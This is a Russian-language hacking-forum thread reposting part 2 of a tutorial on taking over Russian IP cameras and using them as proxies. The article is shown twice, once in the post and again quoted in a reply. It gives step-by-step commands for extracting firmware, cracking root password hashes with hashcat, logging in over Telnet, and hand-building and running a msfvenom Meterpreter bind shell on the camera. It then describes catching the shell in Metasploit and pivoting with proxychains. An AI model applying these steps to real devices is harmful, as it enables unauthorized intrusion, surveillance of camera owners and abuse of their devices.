Сетевой шпионаж – использование российских камер в качестве прокси-серверов. Часть 2

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
banner-1024x683.webp

Добро пожаловать обратно, кибервоины! Мы продолжаем серию статей о взломе камер. На этот раз мы займёмся реверс-инжинирингом, чтобы получить доступ к устройствам, к которым невозможно получить доступ с помощью базовых атак. Как вы уже видели, брутфорс SSH или вход в веб-панель не всегда работают. Вот тут-то и пригодится реверс-инжиниринг прошивки.

1-camera-view-in-moscow-1024x576.webp



Случай 3: Обратный инжиниринг

Допустим, вы нашли камеру, в интерфейсе которой нет опции SSH, но открыт Telnet. Это распространённый случай.



2-telnet-is-open.webp



3-no-ssh-no-telnet-in-settings.webp



В этом случае нам потребуется найти и скачать прошивку для камеры. Существуют разные сайты с прошивками, но при желании вы можете скачать её напрямую с сайта производителя. Имейте в виду, что разные производители используют разные расширения файлов прошивок. Для этой камеры нам понадобится файл .rootfs .



4-firmware-found.webp



После этого установите 7zip , чтобы извлечь содержимое:

kali > sudo apt install p7zip-full

kali > 7z x firmware.rootfs




5-firmware-unzipped.webp



После распаковки вы увидите стандартные каталоги Linux, такие как /etc , /bin и /home .



6-contents-of-the-firmware.webp



Перейдите в каталог /etc и найдите хешированные пароли. Именно там большинство устройств хранят свои данные для входа.



7-passwd-file-found-in-the-firmware.webp



Найдя хеш, сохраните его в файл. Для взлома используйте hashcat с распространённым списком слов, например, rockyou.txt :

Кали > sudo hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt




8-hash-cracked.webp



Эти устройства часто используют слабые пароли по умолчанию. Если вы столкнётесь с камерой безымянного китайского производства, попробуйте пароль, указанный выше, поскольку он широко используется китайскими производителями.

После взлома хеша попробуйте войти с помощью Telnet:

кали > telnet <camera_ip> 23



9-connected-via-telnet-to-the-camera.webp



Используйте имя пользователя root и взломанный пароль при появлении запроса. После входа вам будет доступна оболочка, но Telnet не поддерживает динамическое туннелирование в стиле SSH. Чтобы воспользоваться этим доступом, на камере должна быть запущена оболочка bind. Если на устройстве отсутствуют инструменты, такие как curl или ncat , вам придётся скопировать полезную нагрузку вручную.

Начните с создания оболочки:

kali > msfvenom -p linux/armle/meterpreter/bind_tcp -f elf -o bind



10-generating-a-bind-tcp-payload-for-the-camera.webp



Затем используйте эту одностроковую команду, чтобы преобразовать ее в формат, пригодный для скрипта:

kali > cat bind | od -An -t o1 -v | tr ' ' '/' | while read line; do echo “printf '$line' >> out.bin” | tr '/' '\\'; done Теперь скопируйте вывод скрипта и вставьте его построчно на камеру, чтобы воссоздать полезную нагрузку. После того, как скрипт будет загружен на устройство, дайте ему права на выполнение и запустите:



11-transferring-the-payload-to-the-camera.webp



цель > chmod +x out.bin

цель > ./out.bin


Это запустит вашу оболочку Bind. Вернитесь к машине с Kali, настройте multi/handler в Metasploit с той же полезной нагрузкой и используемым портом, а затем подключитесь.



12-setting-up-a-listener-om-metasploit.webp



После создания сеанса используйте proxychains с SOCKS-прокси, как в части 1, для перемещения внутри сети.

Некоторые цели требуют больше усилий, чем просто вход в систему. Базовый реверс-инжиниринг помогает взломать устройства, которые невозможно взломать методом подбора или легко взломать. Извлекая и анализируя прошивку, взламывая хеши и вручную собирая полезные данные, вы можете получить контроль даже без использования распространённых инструментов или функций, таких как SSH. Камеры становятся отличным ориентиром. В следующей части мы рассмотрим модификацию прошивки для обеспечения её устойчивости и внедрения бэкдора. До встречи!
 
banner-1024x683.webp

Добро пожаловать обратно, кибервоины! Мы продолжаем серию статей о взломе камер. На этот раз мы займёмся реверс-инжинирингом, чтобы получить доступ к устройствам, к которым невозможно получить доступ с помощью базовых атак. Как вы уже видели, брутфорс SSH или вход в веб-панель не всегда работают. Вот тут-то и пригодится реверс-инжиниринг прошивки.

1-camera-view-in-moscow-1024x576.webp



Случай 3: Обратный инжиниринг

Допустим, вы нашли камеру, в интерфейсе которой нет опции SSH, но открыт Telnet. Это распространённый случай.



2-telnet-is-open.webp



3-no-ssh-no-telnet-in-settings.webp



В этом случае нам потребуется найти и скачать прошивку для камеры. Существуют разные сайты с прошивками, но при желании вы можете скачать её напрямую с сайта производителя. Имейте в виду, что разные производители используют разные расширения файлов прошивок. Для этой камеры нам понадобится файл .rootfs .



4-firmware-found.webp



После этого установите 7zip , чтобы извлечь содержимое:

kali > sudo apt install p7zip-full

kali > 7z x firmware.rootfs




5-firmware-unzipped.webp



После распаковки вы увидите стандартные каталоги Linux, такие как /etc , /bin и /home .



6-contents-of-the-firmware.webp



Перейдите в каталог /etc и найдите хешированные пароли. Именно там большинство устройств хранят свои данные для входа.



7-passwd-file-found-in-the-firmware.webp



Найдя хеш, сохраните его в файл. Для взлома используйте hashcat с распространённым списком слов, например, rockyou.txt :

Кали > sudo hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt




8-hash-cracked.webp



Эти устройства часто используют слабые пароли по умолчанию. Если вы столкнётесь с камерой безымянного китайского производства, попробуйте пароль, указанный выше, поскольку он широко используется китайскими производителями.

После взлома хеша попробуйте войти с помощью Telnet:

кали > telnet <camera_ip> 23



9-connected-via-telnet-to-the-camera.webp



Используйте имя пользователя root и взломанный пароль при появлении запроса. После входа вам будет доступна оболочка, но Telnet не поддерживает динамическое туннелирование в стиле SSH. Чтобы воспользоваться этим доступом, на камере должна быть запущена оболочка bind. Если на устройстве отсутствуют инструменты, такие как curl или ncat , вам придётся скопировать полезную нагрузку вручную.

Начните с создания оболочки:

kali > msfvenom -p linux/armle/meterpreter/bind_tcp -f elf -o bind



10-generating-a-bind-tcp-payload-for-the-camera.webp



Затем используйте эту одностроковую команду, чтобы преобразовать ее в формат, пригодный для скрипта:

kali > cat bind | od -An -t o1 -v | tr ' ' '/' | while read line; do echo “printf '$line' >> out.bin” | tr '/' '\\'; done Теперь скопируйте вывод скрипта и вставьте его построчно на камеру, чтобы воссоздать полезную нагрузку. После того, как скрипт будет загружен на устройство, дайте ему права на выполнение и запустите:



11-transferring-the-payload-to-the-camera.webp



цель > chmod +x out.bin

цель > ./out.bin


Это запустит вашу оболочку Bind. Вернитесь к машине с Kali, настройте multi/handler в Metasploit с той же полезной нагрузкой и используемым портом, а затем подключитесь.



12-setting-up-a-listener-om-metasploit.webp



После создания сеанса используйте proxychains с SOCKS-прокси, как в части 1, для перемещения внутри сети.

Некоторые цели требуют больше усилий, чем просто вход в систему. Базовый реверс-инжиниринг помогает взломать устройства, которые невозможно взломать методом подбора или легко взломать. Извлекая и анализируя прошивку, взламывая хеши и вручную собирая полезные данные, вы можете получить контроль даже без использования распространённых инструментов или функций, таких как SSH. Камеры становятся отличным ориентиром. В следующей части мы рассмотрим модификацию прошивки для обеспечения её устойчивости и внедрения бэкдора. До встречи!
какие чуваки пошли нуну
 
Назад
Сверху Снизу